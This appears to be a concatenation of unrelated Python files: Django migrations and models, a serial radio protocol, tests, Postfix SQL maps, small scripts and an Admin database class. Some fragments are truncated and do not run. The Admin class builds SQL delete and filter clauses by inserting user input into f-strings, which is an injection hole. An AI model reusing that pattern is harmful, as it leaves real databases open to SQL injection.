Unique IDs are associated to each item (i/l/s) using a uuid4() generator.
:param response: XML response content from the SBB API call
"""
# root = ET.fromstring(response.response.content)
# we are processing now
self.request_params[(max_res, leave_at)] = 1
params = self.params.get((max_res, leave_at))
if params:
TRIP_CACHE[(params['from_lat'], params['from_lon'], params['to_lat'], params['to_lon'], params['rounded_timestamp'], max_res, leave_at)] = response.response
root = ET.fromstring(response.response)
# Extracts the nodes corresponding to itineraries from the tree
itinerary_nodes = response.get_itinerary_nodes(root)
# Removes itineraries that have been previously added to this trip
itinerary_nodes = self.skip_duplicates_itineraries(itinerary_nodes, self.itinerary_df['context_reconstruction'].values, response)
# itinerary_nodes = ri.skip_duplicates_itineraries(itinerary_nodes,
# self.itinerary_df['context_reconstruction'].values)
# Remove itineraries that overlap with previous/next visit by more than (buffer), a quantity found in CONFIG
itinerary_nodes = self.skip_visit_overlap_itineraries(self.trip, itinerary_nodes, response)
# remove bad nodes
itinerary_nodes = self.remove_unneeded_nodes(itinerary_nodes, response)
self.requests_processed += 1
# Only add a new itinerary if there are any nodes
if len(itinerary_nodes) != 0:
new_itinerary = itinerary.Itinerary(itinerary_nodes, self.config, response)
self.itineraries.append(new_itinerary)
# concat the itinerary df because we need it for future itineraries
self.itinerary_df = pd.concat([self.itinerary_df, new_itinerary.itinerary_df])
# we are done processing
self.request_params[(max_res, leave_at)] = 2
def concat_trip_dfs(self):
self.trip_link_df = pd.concat([self.trip_link_df] + [x.trip_link_df for x in self.itineraries], ignore_index=True)
def concat_legs_dfs(self):
self.legs_df = pd.concat([self.legs_df] + [x.legs_df for x in self.itineraries])
def concat_seg_dfs(self):
self.segments_df = pd.concat([self.segments_df] + [x.segments_df for x in self.itineraries])
def skip_duplicates_itineraries(self, itinerary_nodes, previous_itineraries_cr, response):
# Do not recalculate itineraries already included in that trip
itinerary_nodes = [node for node in itinerary_nodes
if not np.in1d(response.get_itin_context_reconstruction(node), previous_itineraries_cr)]
return itinerary_nodes
def skip_visit_overlap_itineraries(self, trip, itinerary_nodes, response):
time_buffer = timedelta(minutes=int(self.config.get('params', 'VISIT_TIME_OVERLAP_BUFFER')))
min_time = trip['trip_time_start'] - time_buffer
max_time = trip['trip_time_end'] + time_buffer
itinerary_nodes = [node for node in itinerary_nodes
if (response.get_itin_start_datetime(node) > min_time) and
(response.get_itin_end_datetime(node) < max_time)]
return itinerary_nodes
def remove_unneeded_nodes(self, itinerary_nodes, response):
itinerary_nodes = [node for node in itinerary_nodes if self.check_legs(node, response)]
return itinerary_nodes
def check_legs(self, node, response):
for leg in response.get_leg_nodes(node):
if response.get_leg_type(leg) == "FUSSWEG" or response.get_leg_route_category(leg) in LEG_SUB_TYPES or\
(response.get_leg_time_end(leg) - response.get_leg_time_start(leg)) <= timedelta(minutes=5):
continue
else:
return False
return True
|
print()
print('*************************************************************************')
print(' LANGUAGE CONVERTER ')
print('*************************************************************************')
converter = {'aeo':'Hi',
'eooae': 'How are you',
'babaubb' :'I\'m fine',
'chonon' : 'sunny',
'feoung' :'eating',
'yung':'running',
'looen':'sleeping',
'wouugn' :'going',
'trongk' :'angry',
'lola': 'Goodbye'
}
identity=input("Who are you?")
Entered_word =input("Enter any word ")
#CHecking condition that this person is Alien or Human
if identity=='Alien':
for Entered_word
|
import unittest
from katas.kyu_7.russian_postal_codes import zip_validate
class ZipValidateTestCase(unittest.TestCase):
def test_true(self):
self.assertTrue(zip_validate('198328'))
def test_true_2(self):
self.assertTrue(zip_validate('310003'))
def test_true_3(self):
self.assertTrue(zip_validate('424000'))
def test_false(self):
self.assertFalse(zip_validate('12A483'))
def test_false_2(self):
self.assertFalse(zip_validate('1@63'))
def test_false_3(self):
self.assertFalse(zip_validate('111'))
def test_false_4(self):
self.assertFalse(zip_validate('056879'))
def test_false_5(self):
self.assertFalse(zip_validate('1111111'))
|
"""Create tables from data-objects"""
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
from ._table import difference, frequencies, melt, melt_ndvar, stats, repmeas
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2018-01-19 01:46
from __future__ import unicode_literals
from django.db import migrations, models
import helpers.base.jsonfield
class Migration(migrations.Migration):
dependencies = [
('liantang', '0004_auto_20180118_2046'),
]
operations = [
migrations.AlterField(
model_name='jianfanginfo',
name='date',
field=models.DateField(blank=True, null=True, verbose_name='\u7533\u8bf7\u65e5\u671f'),
),
migrations.AlterField(
model_name='jianfanginfo',
name='shenqing',
field=helpers.base.jsonfield.JsonField(blank=True, default={}, verbose_name='\u7533\u8bf7\u6750\u6599'),
),
migrations.AlterField(
model_name='jianfanginfo',
name='xieyi',
field=helpers.base.jsonfield.JsonField(blank=True, default={}, verbose_name='\u534f\u8bae'),
),
]
|
from common.utils import get_nested_item
from functools import partial
from itertools import chain
import re
import unicodedata
def parse_bool(b):
return {
'true': True,
'false': False,
'1': True,
'0': False
}.get(str(b).lower(), bool(b))
def normalize(text):
normalized = (
unicodedata.normalize('NFKD', text)
.encode('ASCII', errors='ignore')
.decode('utf-8')
.upper()
)
return normalized
def cleanup(text):
character_replacement = re.sub(r'\.', '', text)
character_cleanup = re.sub(r'[^A-Z0-9 ]', ' ', character_replacement)
dup_space_cleanup = re.sub(r' +', ' ', character_cleanup)
return dup_space_cleanup
def tokenize(text):
return text.split(' ')
def extract_keywords(literals):
valid_literals = filter(lambda literal: literal is not None, literals)
normalized_literals = map(normalize, valid_literals)
clean_literals = map(cleanup, normalized_literals)
tokenized = map(tokenize, clean_literals)
unique_keywords = set(chain.from_iterable(tokenized))
filter_single_chars = filter(lambda token: len(token) > 2, unique_keywords)
return list(filter_single_chars)
def extract_literals(movement, field_list):
literals = map(
partial(get_nested_item, movement),
field_list
)
return literals
|
import logging
import array
from twisted.internet import reactor
from twisted.internet.serialport import SerialPort
from twisted.internet.protocol import Protocol
def encode_bytes(a):
return ''.join('{:02x}'.format(x) for x in a)
def decode_bytes(s):
return [int(s[i:i+2], 16) for i in xrange(0,len(s),2)]
def crc8(data):
# https://chromium.googlesource.com/chromiumos/platform/vboot_reference/+/master/firmware/lib/crc8.c
crc = 0
for b in data:
crc ^= b << 8
for i in xrange(8):
if (crc & 0x8000) != 0:
crc ^= (0x1070 << 3)
crc <<= 1
return crc >> 8
def _repr_hex_array(a):
return '[' + ', '.join('0x{:02X}'.format(x) for x in a) + ']'
class Packet(object):
def __init__(self, packet_type, data, optional_data):
self.packet_type = packet_type
self.data = data
self.optional_data = optional_data
def __str__(self):
return 'Packet(0x{:02X}, {}, {})'.format(self.packet_type, _repr_hex_array(self.data), _repr_hex_array(self.optional_data))
__repr__ = __str__
def encode(self):
data_len = len(self.data)
header = [data_len >> 8, data_len & 0xff, len(self.optional_data), self.packet_type]
return ([0x55] + header + [crc8(header)] +
self.data + self.optional_data +
[crc8(self.data + self.optional_data)])
@classmethod
def read(clazz, data):
data_len = (data[1]<<8) + data[2]
opt_data_len = data[3]
packet_type = data[4]
data_portion = data[6:-1]
return clazz(packet_type, data_portion[:data_len], data_portion[data_len:])
@classmethod
def from_string(clazz, s):
X = s.split('.')
if len(X) != 3:
raise ValueError('Bad format')
return clazz(decode_bytes(X[0])[0], decode_bytes(X[1]), decode_bytes(X[2]))
def to_string(self):
return (encode_bytes([self.packet_type]) + '.' +
encode_bytes(self.data) + '.' +
encode_bytes(self.optional_data))
class RadioReceiverProtocol(Protocol):
def __init__(self, radio):
self.radio = radio
self.data = []
def gotPacket(self, data):
#print 'got packet: ' + _repr_hex_array(data)
self.radio.gotPacket(Packet.read(data))
def dataReceived(self, data):
self.data += array.array('B', data)
while True:
while len(self.data) > 0 and self.data[0] != 0x55:
print 'additional data: ', self.data[0]
self.data = self.data[1:]
if len(self.data) < 7:
break
data_len = (self.data[1]<<8) + self.data[2]
opt_data_len = self.data[3]
#packet_type = self.data[4]
header_crc = self.data[5]
if crc8(self.data[1:5]) != header_crc:
logging.info("Bad header CRC")
self.data = self.data[1:]
continue
total_len = 6 + data_len + opt_data_len + 1
if len(self.data) < total_len:
break
if crc8(self.data[6:(total_len-1)]) != self.data[total_len-1]:
logging.info("Bad data CRC")
else:
self.gotPacket(self.data[:total_len])
self.data = self.data[total_len:]
if len(self.data) > 100:
self.data = []
class Radio(object):
def connect(self, port):
self.serial = SerialPort(RadioReceiverProtocol(self), port, reactor, baudrate=57600)
self.serial.flushInput()
def __init__(self):
self.listeners = []
self.serial = None
def send(self, packet):
data = array.array('B', packet.encode()).tostring()
print 'tx:', packet
if self.serial is not None:
self.serial.write(data)
def gotPacket(self, packet):
print 'rx:', packet
for l in self.listeners:
l(packet)
RADIO = Radio()
def start_radio(port='/dev/ttyAMA0'):
logging.info('Starting radio at {}'.format(port))
RADIO.connect(port)
|
# Generated by Django 3.1.7 on 2021-03-15 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='extendexd_user_model',
name='user_profile',
field=models.ImageField(db_column='user_profile', upload_to='userprofiles', verbose_name='Select Profile Picture'),
),
]
|
from django.db import models
from django import forms
from south.db import db
models.Field.db_index = True
import datetime
class Aboutme(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField(blank=True)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Education(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField(blank=True)
course = models.ForeignKey('Course')
collegelink = models.URLField(max_length=200)
#courses = models.TextField(blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Course(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField(blank=True)
#link = models.URLField(max_length=200)
def __unicode__(self):
return self.name
class Languages(models.Model):
name = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
experience = models.TextField(blank=True)
link = models.URLField(max_length=200)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Software(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
software = models.TextField(blank=True)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Environment(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField(blank=True)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Skills(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
language = models.ForeignKey('Languages')
software = models.ForeignKey('Software')
environment = models.ForeignKey('Environment')
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Company(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
title = models.CharField(max_length=200)
description = models.TextField(blank=True)
link = models.URLField(max_length=200)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
class Media:
js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')
def __unicode__(self):
return self.name
class Experience(models.Model):
company = models.ForeignKey('Company')
slug = models.SlugField(unique=True)
def __unicode__(self):
return self.name
class MediaCredit(models.Model):
name = models.CharField(max_length=200)
link = models.URLField(max_length=200)
image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)
def __unicode__(self):
return self.name
class ContactForm(forms.Form):
subject = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'size':65}))
message = forms.CharField(widget=forms.Textarea(attrs={'rows':15, 'cols':61}))
sender = forms.EmailField(widget=forms.TextInput(attrs={'size':65}))
#cc_myself = forms.BooleanField(required=False)
class Hit(models.Model):
#allview = models.ForeignKey(Question, related_name='questionviews')
ip = models.CharField(max_length=40)
session = models.CharField(max_length=40)
created = models.DateTimeField(datetime.datetime.now())
# Create your models here.
|
"""Base cache support."""
import errno
import os
import pathlib
import shutil
from operator import attrgetter
from typing import NamedTuple
from snakeoil import klass
from snakeoil.cli.exceptions import UserException
from snakeoil.mappings import ImmutableDict
from snakeoil.osutils import pjoin
from . import const
class CacheData(NamedTuple):
"""Cache registry data."""
type: str
file: str
version: int
class Cache:
"""Mixin for data caches."""
__getattr__ = klass.GetAttrProxy('_cache')
class _RegisterCache(type):
"""Metaclass for registering caches."""
def __new__(cls, name, bases, class_dict):
new_cls = type.__new__(cls, name, bases, class_dict)
if new_cls.__name__ != 'CachedAddon':
if new_cls.cache is None:
raise ValueError(f'invalid cache registry: {new_cls!r}')
new_cls.caches[new_cls] = new_cls.cache
return new_cls
class CachedAddon(metaclass=_RegisterCache):
"""Mixin for addon classes that create/use data caches."""
# attributes for cache registry
cache = None
# registered cache types
caches = {}
def update_cache(self, force=False):
"""Update related cache and push updates to disk."""
raise NotImplementedError(self.update_cache)
@staticmethod
def cache_dir(repo):
"""Return the cache directory for a given repository."""
return pjoin(const.USER_CACHE_DIR, 'repos', repo.repo_id.lstrip(os.sep))
def cache_file(self, repo):
"""Return the cache file for a given repository."""
return pjoin(self.cache_dir(repo), self.cache.file)
@classmethod
def existing(cls):
"""Mapping of all existing cache types to file paths."""
caches_map = {}
repos_dir = pjoin(const.USER_CACHE_DIR, 'repos')
for cache in sorted(cls.caches.values(), key=attrgetter('type')):
caches_map[cache.type] = tuple(sorted(
pathlib.Path(repos_dir).rglob(cache.file)))
return ImmutableDict(caches_map)
@staticmethod
def update_caches(options, addons):
"""Update all known caches."""
ret = []
force = getattr(options, 'force_cache', False)
for addon in addons:
ret.append(addon.update_cache(force=force))
return any(ret)
@classmethod
def remove_caches(cls, options):
"""Remove all or selected caches."""
force = getattr(options, 'force_cache', False)
if force:
try:
shutil.rmtree(const.USER_CACHE_DIR)
except FileNotFoundError:
pass
except IOError as e:
raise UserException(f'failed removing cache dir: {e}')
else:
try:
for cache_type, paths in cls.existing().items():
if options.cache.get(cache_type, False):
for path in paths:
if options.dry_run:
print(f'Would remove {path}')
else:
path.unlink()
# remove empty cache dirs
try:
while str(path) != const.USER_CACHE_DIR:
path.parent.rmdir()
path = path.parent
except OSError as e:
if e.errno == errno.ENOTEMPTY:
continue
raise
except IOError as e:
raise UserException(f'failed removing {cache_type} cache: {path!r}: {e}')
return 0
|
# Generated by Django 2.1.2 on 2018-11-07 01:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('misPerrisDJ', '0009_auto_20181106_2237'),
]
operations = [
migrations.AddField(
model_name='persona',
name='ciudad',
field=models.CharField(choices=[('', 'Seleccione una ciudad'), ('santiago', 'Santiago')], default='', max_length=50),
),
]
|
from django.contrib import admin
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from . import views
schema_view = get_schema_view(
openapi.Info(
title="Predictor",
default_version='v1',
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="contact@snippets.local"),
license=openapi.License(name="BSD License"),
),
public=True,
)
urlpatterns = [
path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),
path('name_maker/', views.PredictorViewSet.as_view(
{"post": "create"})
),
] |
import sys
sys.path.append('../../')
import unittest
from mock import IgorMock, ClientMock
from igor.core import Stream, ProcessOutput, handler_wrapper, flatten
import json
import time
import asyncio
class TestDictionaryFlatten(unittest.TestCase):
def test_flatten(self):
dictionary = {
'a': {
'b': 'c'
},
'd': 'e'
}
flattened = flatten(dictionary)
values = list(flattened.values())
keys = list(flattened.keys())
if len(keys) != 2 or len(values) != 2:
self.fail('Flattened dictionary should have two keys and two values')
if keys[1] != 'a.b':
self.fail('Flattened dictionary should have merged key names')
if keys[0] != 'd' or values[0] != 'e':
self.fail('Flattened dictionary should leave root level fields untouched')
if values[1] != 'c':
self.fail('Flattened fields should have correct values')
class TestStream(unittest.TestCase):
def setUp(self):
self.STREAM_ID = 'STREAM_ID'
self.CLIENT_ID = "CLIENT_ID"
self.igor_mock = IgorMock()
self.client_mock = ClientMock(self.CLIENT_ID)
def test_send(self):
STREAM_DATA = {'test': 'test'}
def mocked_send_message(client, serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
self.igor_mock.server.send_message = mocked_send_message
stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, None)
stream.send(STREAM_DATA)
def test_send_error(self):
STREAM_ERROR = 'ERROR'
def mocked_send_message(client, serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
self.assertEqual(serialized_message['error'], STREAM_ERROR, 'Stream error should match')
self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
self.igor_mock.server.send_message = mocked_send_message
stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, None)
stream.send_error(STREAM_ERROR)
def test_close(self):
did_call_callback = {'value': False}
def mocked_send_message(client, serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
close = serialized_message.get('close', None)
if close == None:
self.fail('Stream closing message should have "close" field')
self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
self.assertEqual(close, True, '"close" should have value True')
def mocked_close_callback(igor_server, stream_id):
did_call_callback['value'] = True
self.assertEqual(stream_id, self.STREAM_ID, 'Stream id should match')
self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
self.igor_mock.server.send_message = mocked_send_message
stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, mocked_close_callback)
stream.close()
time.sleep(0.2)
self.assertEqual(did_call_callback['value'], True, 'Stream should call "on_close_callback"')
class TestProcessOutput(unittest.TestCase):
def setUp(self):
self.STREAM_ID = 'STREAM_ID'
self.PROCESS_ID = "PROCESS_ID"
self.CLIENT_ID = "CLIENT_ID"
self.ACTION = "ACTION"
self.client_mock = ClientMock(self.CLIENT_ID)
self.igor_mock = IgorMock()
self.igor_mock.clients = {
'CLIENT_ID': self.client_mock
}
def test_send_to_valid_client(self):
STREAM_DATA = {'test': 'test'}
def mocked_send_message(client, serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
self.assertEqual(client, self.client_mock, 'Clients should match')
self.igor_mock.server.send_message = mocked_send_message
output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
output.send(self.ACTION, STREAM_DATA, client_id=self.CLIENT_ID)
def test_send_to_nonexisting_client(self):
output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
self.assertRaises(
Exception,
'Sending message to invalid client id should raise an Exception',
output.send,
self.ACTION,
None,
client_id='NONEXISING_CLIENT'
)
def test_send_to_all(self):
was_send_to_all_called = {'value': False}
STREAM_DATA = {'test': 'test'}
def mocked_send_message_to_all(serialized_message):
was_send_to_all_called['value'] = True
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
self.igor_mock.server.send_message_to_all = mocked_send_message_to_all
output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
output.send(self.ACTION, STREAM_DATA)
time.sleep(0.2)
self.assertEqual(was_send_to_all_called['value'], True, 'Should call "send_message_to_all" on server')
def test_send_error(self):
STREAM_ERROR = 'STREAM_ERROR'
def mocked_send_message(client, serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
self.assertEqual(serialized_message['error'], STREAM_ERROR, 'Stream error should match')
self.assertEqual(client, self.client_mock, 'Clients should match')
self.igor_mock.server.send_message = mocked_send_message
output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
output.send_error(STREAM_ERROR, client_id=self.CLIENT_ID)
def test_finish(self):
did_call_callback = {'value': False}
def mocked_send_message_to_all(serialized_message):
try:
serialized_message = json.loads(serialized_message)
except Exception:
self.fail('Stream data should be JSON serializable string')
close = serialized_message.get('close', None)
if close == None:
self.fail('Stream closing message should have "close" field')
self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match')
self.assertEqual(close, True, '"close" should have value True')
def mocked_finish_callback(igor_server, stream_id):
did_call_callback['value'] = True
self.assertEqual(stream_id, self.PROCESS_ID, 'Stream id should match')
self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
self.igor_mock.server.send_message_to_all = mocked_send_message_to_all
output = ProcessOutput(self.PROCESS_ID, self.igor_mock, mocked_finish_callback)
output.finish()
self.assertEqual(output.closed, True, 'Ouput "closed" field value should be True')
time.sleep(0.2)
self.assertEqual(did_call_callback['value'], True, 'Should call "on_finish_callback"')
class TestHandlerWrapper(unittest.TestCase):
def setUp(self):
self.STREAM_ID = 'STREAM_ID'
self.igor_mock = IgorMock()
def mock_send_message(client, serialized_message):
pass
self.igor_mock.server.send_message = mock_send_message
self.CLIENT_ID = "CLIENT_ID"
self.client_mock = ClientMock(self.CLIENT_ID)
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
def test_if_closes_stream(self):
did_call_callback = {'value': False}
did_call_function = {'value': False}
STREAM_DATA = {'test': 'test'}
def mocked_close_callback(igor_server, stream_id):
self.assertEqual(stream_id, self.STREAM_ID, 'Stream id should match')
self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
did_call_callback['value'] = True
stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, mocked_close_callback)
def function(stream, data, **kwargs):
did_call_function['value'] = True
self.assertEqual(stream.stream_id, self.STREAM_ID, 'Stream id should match')
self.assertEqual(data, STREAM_DATA, 'Stream data should match')
self.loop.run_until_complete(handler_wrapper(function, stream, STREAM_DATA, {}, {}))
time.sleep(0.1)
self.assertEqual(did_call_function['value'], True, 'Should call function')
self.assertEqual(did_call_callback['value'], True, 'Should close stream after handler function finish')
if __name__ == '__main__':
unittest.main() |
"""Map file definitions for postfix."""
class RelayDomainsMap(object):
"""Map file to list all relay domains."""
filename = "sql-relaydomains.cf"
mysql = (
"SELECT name FROM admin_domain "
"WHERE name='%s' AND type='relaydomain' AND enabled=1"
)
postgres = (
"SELECT name FROM admin_domain "
"WHERE name='%s' AND type='relaydomain' AND enabled"
)
sqlite = (
"SELECT name FROM admin_domain "
"WHERE name='%s' AND type='relaydomain' AND enabled=1"
)
class SplitedDomainsTransportMap(object):
"""A transport map for splited domains.
(ie. ones with both local and remote mailboxes)
"""
filename = "sql-spliteddomains-transport.cf"
mysql = (
"SELECT 'lmtp:unix:private/dovecot-lmtp' "
"FROM admin_domain AS dom "
"INNER JOIN admin_mailbox AS mbox ON dom.id=mbox.domain_id "
"INNER JOIN core_user AS u ON mbox.user_id=u.id "
"WHERE dom.type='relaydomain' AND dom.enabled=1 "
"AND dom.name='%d' AND u.is_active=1 "
"AND mbox.address='%u'"
)
postgres = (
"SELECT 'lmtp:unix:private/dovecot-lmtp' "
"FROM admin_domain AS dom "
"INNER JOIN admin_mailbox AS mbox ON dom.id=mbox.domain_id "
"INNER JOIN core_user AS u ON mbox.user_id=u.id "
"WHERE dom.type='relaydomain' AND dom.enabled "
"AND dom.name='%d' AND u.is_active "
"AND mbox.address='%u'"
)
sqlite = (
"SELECT 'lmtp:unix:private/dovecot-lmtp' "
"FROM admin_domain AS dom "
"INNER JOIN admin_mailbox AS mbox ON dom.id=mbox.domain_id "
"INNER JOIN core_user AS u ON mbox.user_id=u.id "
"WHERE dom.type='relaydomain' AND dom.enabled=1 "
"AND dom.name='%d' AND u.is_active=1 "
"AND mbox.address='%u'"
)
class RelayRecipientVerification(object):
"""A map file to enable recipient verification."""
filename = "sql-relay-recipient-verification.cf"
mysql = (
"SELECT action FROM relaydomains_recipientaccess WHERE pattern='%d'"
)
postgres = (
"SELECT action FROM relaydomains_recipientaccess WHERE pattern='%d'"
)
sqlite = (
"SELECT action FROM relaydomains_recipientaccess WHERE pattern='%d'"
)
|
from Question import Question
question_prompts = [
"What color are apples? \n(a) Red/Green\n(b) Purple\n(c) Orange\n(d) Yellow\n\n",
"What color are Bananas? \n(a) Yellow/Green\n(b) Violet\n(c) Black\n(d) Brown\n\n",
"What color are Strawberries? \n(a) Blue/Yellow\n(b) Magenta\n(c) Orange\n(d) Red\n\n"
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "a"),
Question(question_prompts[2], "d")
]
def run_test(questions):
score = 0
for question in questions:
answer = input(question.prompt)
if answer == question.answer:
score += 1
print("You got " + str(score) + "/" + str(len(questions)) + " correct")
run_test(questions) |
import os
import time
def search(d): #search function
query=input("query: ")
query = query.strip(" ").split() #get rid of the front and rear spaces, space being the delimiter
query = list(set(query))
Found_List=[]
if ("or" in query) and ("and" not in query): #"OR" search
query.remove("or")
print("Performing OR search for: ", query)
for word in d:
for quote in query:
if quote in word[1]:
print ("Found at", word[0])
print (time.ctime(os.path.getmtime(word[0])))
print (os.path.getsize(word[0]))
print ('\n')
break
elif("and" in query) or (len(query)==1) or ("and" not in query) and ("or" not in query):
if "and" in query:
query.remove("and")
if "or" in query:
query.remove("or")
print ("Performing AND search for: ",query)
query_len = (len(query))
i = 0
for word in d:
for quote in query:
if quote in word[1]:
i = i + 1
if query_len == i:
print ("Found at", word[0])
print (time.ctime(os.path.getmtime(word[0])))
print (os.path.getsize(word[0]))
print ('\n')
i = 0
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.backend.experimental.java.register import rules as java_rules
from pants.backend.openapi.codegen.java.rules import rules as java_codegen_rules
def target_types():
return []
def rules():
return [*java_rules(), *java_codegen_rules()]
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, JsonResponse
from secondapp.models import Hospital
# Create your views here.
def index(request):
hospital_list = Hospital.objects.order_by('id')
print(hospital_list)
return render(
request, 'secondapp/home.html',
{'hospital_list':hospital_list}
)
def index2(request, hospital_id):
hospital_list2 = get_object_or_404(Hospital, id=hospital_id)
return render(
request, 'secondapp/home2.html',
{'hospital_list2':hospital_list2}
)
def index3(request):
hospital_list3 = Hospital.objects.all()
return render(
request, 'secondapp/home3.html',
{'hospital_list3':hospital_list3}
) |
import psycopg2
from setup import *
from connection import Connection
from pprint import pprint
from datetime import date
from cus import respprint
class Admin(Connection):
def __init__(self, login, password):
self.login = login
self.password = password
def register_self(self, data):
table = 'login'
if self._connectDb(self.login, self.password):
if self._auditDb(table, list(data[0].values())[0]):
result = self._postData(table, data)
return result
else:
return 'A user with this login already exists'
else:
return 'Incorrect login or password'
def add_product(self, data):
if self._connectDb(self.login, self.password):
table = 'product'
result = self._postData(table, data)
return result
else:
return 'Incorrect login or password'
def add_pr_category(self, data):
if self._connectDb(self.login, self.password):
table = 'product_category'
result = self._postData(table, data)
return result
else:
return 'Incorrect login or password'
def add_employee(self, data):
if self._connectDb(self.login, self.password):
table = 'employee'
result = self._postData(table, data)
return result
else:
return 'Incorrect login or password'
def delete_product(self, selector):
if self._connectDb(self.login, self.password):
table = 'product'
selector = f"product_name = '{selector}'"
result = self._deleteData(table, selector)
return result
else:
return 'Incorrect login or password'
def delete_pr_category(self, selector):
if self._connectDb(self.login, self.password):
table = 'product_category'
selector = f"category_name = '{selector}'"
result = self._deleteData(table, selector)
return result
else:
return 'Incorrect login or password'
def delete_employee(self, selector):
if self._connectDb(self.login, self.password):
table = 'employee'
selector = f"first_name = '{selector}'"
result = self._deleteData(table, selector)
return result
else:
return 'Incorrect login or password'
def delete_customer(self, selector):
if self._connectDb(self.login, self.password):
table = 'customer'
selector = f"first_name = '{selector}'"
result = self._deleteData(table, selector)
return result
else:
return 'Incorrect login or password'
def edit_product(self, data, selector):
if self._connectDb(self.login, self.password):
table = 'product'
result = self._updateData(table, data, selector)
return result
else:
return 'Incorrect login or password'
def edit_pr_category(self, data, selector):
if self._connectDb(self.login, self.password):
table = 'product_category'
result = self._updateData(table, data, selector)
return result
else:
return 'Incorrect login or password'
def edit_employee(self, data, selector):
if self._connectDb(self.login, self.password):
table = 'employee'
result = self._updateData(table, data, selector)
return result
else:
return 'Incorrect login or password'
def get_order_info(self, category, selector=''):
if self._connectDb(self.login, self.password):
categoryes = ['city_name', 'date_of_order', 'product_name']
table = ('orders o',)
fields = ("""o.id, concat(e.first_name,' ', e.last_name) as "employee", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as "customer", p.product_name, o.price """,)
if category and category in categoryes and selector:
where = f"""where {category} = '{selector}'"""
else:
where = ''
selector = f""" inner JOIN employee e on e.id = o.employee_id
inner JOIN city c on c.id = o.city_id
inner JOIN customer c2 on c2.id = o.customer_id
